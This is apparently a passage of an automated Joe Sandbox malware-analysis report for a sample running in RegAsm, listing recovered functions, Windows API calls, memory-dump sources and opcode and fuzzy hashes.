                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$cannot open file$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                                                                              • API String ID: 0-1799306995
                                                                                                                                                                                                                                                              • Opcode ID: c7c9ff48b8790d245b879a035df16a61ceefc303509d7287d64bba92fbcd0e60
                                                                                                                                                                                                                                                              • Instruction ID: 015416104eb1421208e2019fe270dd93b112a3d675cf28451c16372cbf20f579
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7c9ff48b8790d245b879a035df16a61ceefc303509d7287d64bba92fbcd0e60
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EBB09B5559415076D701A658CC01FD63C1077D0D00FDDD854714537295D095C0D4D551
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 1cbd345ac3afc232f4f37ca8e15a1c5cd367880f5bd9466d67f2ee02193d351f
                                                                                                                                                                                                                                                              • Instruction ID: 2aab99876b3f92e7c75eeda4377ba18ad98ef048ba51dc19e8ac8c321bf8db60
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1cbd345ac3afc232f4f37ca8e15a1c5cd367880f5bd9466d67f2ee02193d351f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F041EE366006059FD314DF18D980B12F7E0FF84324F28896EE94687AA2D772F891CB90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 245aa9ccac96598925b1bceddeb8a94ee369d56682fef41a296c27c3f5d4ef8e
                                                                                                                                                                                                                                                              • Instruction ID: e0e39838cc26d90159ddbac65004f5166e724b26ce86c843276986d5f60733a5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 245aa9ccac96598925b1bceddeb8a94ee369d56682fef41a296c27c3f5d4ef8e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B31C2B6B053059FD710CF68E840B9AB3E8FF94321F28897EE905C7690E325E944D7A1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
                                                                                                                                                                                                                                                              • Instruction ID: 7bff542cf5cd075f5e05602355697a0e5bc06f49aa4bb95fc35a2a0d303d2bf3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A31AD75504B959BD324CB29F84079EB7E0BFA9314F28892ED89A83A40D332F498C791
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: strtok_s$H_prolog
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1158113254-0
                                                                                                                                                                                                                                                              • Opcode ID: e7445b8ad0cf16fa368b4061095d3ac76da92b0ea8b5ce5afeb953bf5f5f6c20
                                                                                                                                                                                                                                                              • Instruction ID: c1a0159c24e06e7e6c0f372b1166df1df519fc89697668f976349a7732d3506c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7445b8ad0cf16fa368b4061095d3ac76da92b0ea8b5ce5afeb953bf5f5f6c20
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D21F771600606ABCB18DFA1E9C5AEBB3A8EF14304B10847FE416D7591DBB8EDC4C654
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,00000000,?,?,00000000), ref: 19A1F4E0
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 19A1F4ED
                                                                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 19A1F513
                                                                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 19A1F539
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FilePointer$ErrorLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 142388799-0
                                                                                                                                                                                                                                                              • Opcode ID: 1216b5c90f2743a6bd2e117506ce811a61a3532f0ead945120973d1fb8fff686
                                                                                                                                                                                                                                                              • Instruction ID: c101f772e394ccdaf386c18e719012d05a3e6b4a04e1414d00742a717d4b3378
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1216b5c90f2743a6bd2e117506ce811a61a3532f0ead945120973d1fb8fff686
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36112A719001A9BFDF109F69CC48DDE3F7DEF00760F144154F8289A1A0D7319659DBA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3016257755-0
                                                                                                                                                                                                                                                              • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                                              • Instruction ID: 3784c3b86d684b00020f6c8317c88db4bea9c337dc5f495ba4d79cfbb30e6857
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A511407604814EBBCF125F89CC41CEE3F32BF19358B588556FA1859131D33AD9B2AB85
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prologlstrcatlstrcpylstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 809291720-0
                                                                                                                                                                                                                                                              • Opcode ID: 5bd464c41beb7060fe26781fd62a064241158a3b98bbfd09324de135d2f4d82a
                                                                                                                                                                                                                                                              • Instruction ID: c1d13b7228f3b328fe2aa5b4acc79674b111ccd5454426d6a9c5d0fdcf5e229c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5bd464c41beb7060fe26781fd62a064241158a3b98bbfd09324de135d2f4d82a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38015AB2900206EFDB149F9AE88499AFBB5FF48314B10C93EE459E3250C774A9508B90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 19A21382
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 19A2138E
                                                                                                                                                                                                                                                              • ___initconout.LIBCMT ref: 19A2139E
                                                                                                                                                                                                                                                                • Part of subcall function 19A21303: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,19A213A3), ref: 19A21316
                                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 19A213B3
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ConsoleWrite$CreateErrorFileLast___initconout
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3431868840-0
                                                                                                                                                                                                                                                              • Opcode ID: e0421d148a99e8b15b310e3c933322dc8e720617c96c96c8e4778d6119fe62b5
                                                                                                                                                                                                                                                              • Instruction ID: cf66f5f1c23417264a5ff8319a6f41bdff72d0704bcb17f8866578f1fac36ada
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e0421d148a99e8b15b310e3c933322dc8e720617c96c96c8e4778d6119fe62b5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49F0373A1101B5BFCF621FB9CD459C93F7BFB447A1F564010F91C85520DA329969DB90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: string or blob too big
                                                                                                                                                                                                                                                              • API String ID: 0-2803948771
                                                                                                                                                                                                                                                              • Opcode ID: 9b94b1cde56c47ddd4763b45a83f643cafce249da56866879956405f13e98705
                                                                                                                                                                                                                                                              • Instruction ID: 46da76ad0dee3284a4fb6b140b22c228fbc2cc841eac9be469cdb9423c72450f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b94b1cde56c47ddd4763b45a83f643cafce249da56866879956405f13e98705
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EFA168B6D087869FD7008E29CC5132AB7D1AF99222F9C1B1DFCA1873D1E770D6858AC1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: YHI;
                                                                                                                                                                                                                                                              • API String ID: 0-2037931556
                                                                                                                                                                                                                                                              • Opcode ID: 1a49707515c11b6712e429249a68e01c874bb591246e639a411c55bc834540ef
                                                                                                                                                                                                                                                              • Instruction ID: a8013f6eddcd1169af8919ccaeaaf7e0f36da6a0448b357613ee8bad2dc877f5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a49707515c11b6712e429249a68e01c874bb591246e639a411c55bc834540ef
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8091E0B59043899BC710CF64CC81B9B77E8AF98354F2D492DF8889B282E739F5458792
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
